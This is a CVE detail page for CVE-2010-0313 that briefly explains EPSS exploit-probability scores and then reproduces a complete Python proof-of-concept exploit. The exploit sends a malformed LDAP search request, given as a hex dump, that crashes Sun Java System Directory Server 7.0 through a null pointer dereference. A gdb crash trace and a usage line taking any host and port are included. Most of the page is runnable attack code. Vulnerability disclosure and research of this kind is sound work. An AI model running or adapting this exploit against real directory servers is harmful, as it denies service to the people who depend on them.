CVE-2010-0313 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/37699/info Sun Java System Directory Server is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the effected application, denying service to legitimate users. Directory Server 7.0 is vulnerable; other versions may also be affected. #!/usr/bin/env python # sun_dsee7.py # # Use this code at your own risk. Never run it against a production system. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. import socket import sys """ Sun Directory Server 7.0 core_get_proxyauth_dn() DoS (null ptr dereference) Tested on SUSE Linux Enterprise Server 11 # dsadm -V [dsadm] dsadm : 7.0 B2009.1104.2350 ZIP Copyright 2009 Sun Microsystems, Inc. All Rights Reserved. SUN PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. [slapd 32-bit] Sun Microsystems, Inc. Sun-Directory-Server/7.0 B2009.1104.2350 32-bit ns-slapd : 7.0 B2009.1104.2350 ZIP Slapd Library : 7.0 B2009.1104.2350 Front-End Library : 7.0 B2009.1104.2350 This simple proof of concept code will crash ns-slapd daemon: Attaching to process 10204 Reading symbols from /opt/sun/dsee7/lib/ns-slapd...(no debugging symbols found)...done. Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done. ... Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xb1b47b90 (LWP 10233)] 0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so (gdb) bt #0 0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so #1 0xb7ff30d3 in common_core_set_pb () from /opt/sun/dsee7/lib/libslapd.so #2 0xb7f1c7eb in search_core_set_pb () from /opt/sun/dsee7/lib/libfe.so #3 0xb7f2667f in ldap_decode_search () from /opt/sun/dsee7/lib/libfe.so #4 0xb7f27993 in ldap_parse_request () from /opt/sun/dsee7/lib/libfe.so #5 0xb7f147a4 in process_ldap_operation_using_core_api () from /opt/sun/dsee7/lib/libfe.so #6 0xb7f149ba in ldap_frontend_main_using_core_api () from /opt/sun/dsee7/lib/libfe.so #7 0xb7f153e3 in generic_workerthreadmain () from /opt/sun/dsee7/lib/libfe.so #8 0xb7eec89e in _pt_root () from /opt/sun/dsee7/lib/../lib/private/libnspr4.so #9 0xb80481b5 in start_thread () from /lib/libpthread.so.0 #10 0xb7ccb3be in clone () from /lib/libc.so.6 (gdb) x/i $eip 0xb80098c4 : cmpb $0x4,(%eax) (gdb) i r eax eax 0x0 0 (gdb) """ def send_req(host,port): """ LDAP Message, Search Request Message Id: 1 Message Type: Search Request (0x03) Message Length: 270 Base DN: (null) Scope: Subtree (0x02) Dereference: Never (0x00) Size Limit: 0 Time Limit: 0 Attributes Only: False Filter: (objectClass=*) Attribute: (null) LDAP Controls LDAP Control Control OID: 2.16.840.1.113730.3.4.18 Control Critical: True ERROR: Couldn't parse LDAP Control: Wrong type for that item """ reqdump=""" 30 82 01 15 02 01 01 63 82 01 0e 04 00 0a 01 02 0a 01 00 02 01 00 02 01 00 01 01 00 87 0b 6f 62 6a 65 63 74 43 6c 61 73 73 30 02 04 00 a0 81 e9 30 81 e6 04 18 32 2e 31 36 2e 38 34 30 2e 31 2e 31 31 33 37 33 30 2e 33 2e 34 2e 31 38 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 04 00 """ buf = "" for i in filter(lambda x: len(x.strip())>0, reqdump.split(" ")): buf+=chr(int(i,16)) print "Sending req to %s:%d" % (host,port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) sock.sendall(buf) sock.close() print "Done" if __name__=="__main__": if len(sys.argv)<3: print "usage: %s host port" % sys.argv[0] sys.exit() send_req(sys.argv[1],int(sys.argv[2]))